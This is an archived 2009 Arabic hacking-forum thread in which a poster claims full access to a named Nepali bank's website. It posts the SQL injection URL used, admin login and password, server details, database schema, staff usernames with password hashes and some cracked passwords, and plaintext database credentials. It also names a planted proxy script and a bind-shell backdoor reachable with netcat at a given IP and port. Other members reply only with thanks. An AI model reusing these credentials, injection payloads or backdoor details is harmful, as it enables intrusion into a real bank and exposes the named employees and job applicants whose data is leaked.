:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات (http://www.vbspiders.com/vb/f38.html)
-   -   FULL ACCESS nccbank.com.np (http://www.vbspiders.com/vb/t17488.html)

bl4ck 08-13-2009 02:03 AM
FULL ACCESS nccbank.com.np
 
FULL ACCESS nccbank.com.np

كود:
http://www.nccbank.com.np/displaynotice.php?idnotices=1+AND+1=2+UNION+SELECT+1,2--


Start exploiting...



اقتباس:
http://www.nccbank.com.np/admin/

Login: hrddept
Password: dept123




اقتباس:
uname -a: Linux server.net-ns.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
sysctl: Linux 2.6.18-128.1.10.el5
$OSTYPE: linux-gnu
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2
id: uid=99(nobody) gid=99(nobody) groups=99(nobody)
pwd: /home/nccbank/public_html/downloadfile

اقتباس:
Database: nccbank_ncc
User: nccbank_admin@localhost
Version: 5.0.81-community

اقتباس:
[1]login: id,name,password,type_id,fullname

كود:
1:URESHadmin:83b7b87b1c36724d60760403eecde40a:4:Uresh:
2:samrat:91614fb63fdc19e1fc84948f37962424:2:Samrat Dahal:
2:samrat:samrat:2:Samrat Dahal:
3:marketing:81dc2d59641012def5767ebb19af1fa5:1:Marketing Department:
4:marketing:81dc2d59641012def5767ebb19af1fa5:2:Marketing Department:
5:softncc:7bf80211d4b897c7ac08948032ecdfe5:4:soft:
6:hrd:40c4038633e70ed9dd6800390fa40fd8:4:Human Resource:
7:hrddept:60f2716d5ae7cddf7e2c590a241107b2:4:Human Resource Dept:
7:hrddept:dept123:4:Human Resource Dept:

اقتباس:
[2]tbl_auction: id,auction_title,from_date,to_date,filename,status ,level
[3]tbl_currency: id,currency,unit,level
[4]tbl_forex: id,curr_id,cynotes_buying,otherins_buying,otherins _selling,sales_selling,sales_buying,_date
[5]tbl_news: id,news_head,news_body,level,news_status
[6]tbl_notice: id,notice_title,notice_body,status
[7]tbl_pdf: id,title,filename,_date,menu,enabled,level
[8]tbl_vacancy: v_id,name,permanent_add,contact_add,txtCNo,txtPIss ue,txtDIssue,family,spouse_name,father_name,teleph one,mobile,email,qualification,university,passed_y ear,division,cgpa,percent,chkothers,computer_skill ,chkbanking,pos_held,pos_held2,pos_held3,pos_held4 ,prev_employer,prev_employer2,prev_employer3,prev_ employer4,years_emp,years_emp2,years_emp3,years_em p4,experience,experience2,experience3,experience4, subject,subject2,subject3,subject4,duration,durati on2,duration3,duration4,conducted_by,conducted_by2 ,conducted_by3,conducted_by4,speaking_np,spe
aking_en,listening_np,listening_en,writing_np,writ ing_en,writing_oth,speaking_oth,listening_oth,im,f name,fdate,sp_qualification,extra_act,extra_act2,r eason,dob_np,dob_en,job_for,txtname1,txtname2,txta ddress1,txtaddress2,txtcontact1,txtcontact2,date
[9]tbl_xl: id,title,filename,_date,level,fileIn
[10]user_type: id



كود:
nccbank:x:33652:33652::/home/nccbank:/usr/local/cpanel/bin/noshell

You can upload shell if you want;)

AZOZ 08-13-2009 02:33 AM
Thanks, but if put in place the SQL

Regards

bl4ck 08-13-2009 03:31 AM
anyway...

nccbank_admin','knabcnk123','nccbank_ncc','localho st

<?php
// Include ezSQL core
include_once "shared/ez_sql_core.php";

// Include ezSQL database specific component
include_once "ez_sql_mysql.php";

// Initialise database object and establish a connection
// at the same time - db_user / db_password / db_name / db_host
$db = new ezSQL_mysql('nccbank_admin','knabcnk123','nccbank_ ncc','localhost');


?>


I like this bank :D he give me proxy :D

http://www.nccbank.com.np/downloadfile/proxy.php

and


:: w4ck1ng-shell (Private Build v0.3) bind shell backdoor ::

nc 216.45.57.231 5225

AZOZ 08-13-2009 04:32 AM
Is not expected to enter Bass changed by someone

(: ....Looking forward to more

Dr.Alaa 08-13-2009 09:16 PM
thanks black

zaky092 09-29-2009 01:37 AM
بارك الله فيك


الساعة الآن 10:40 PM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0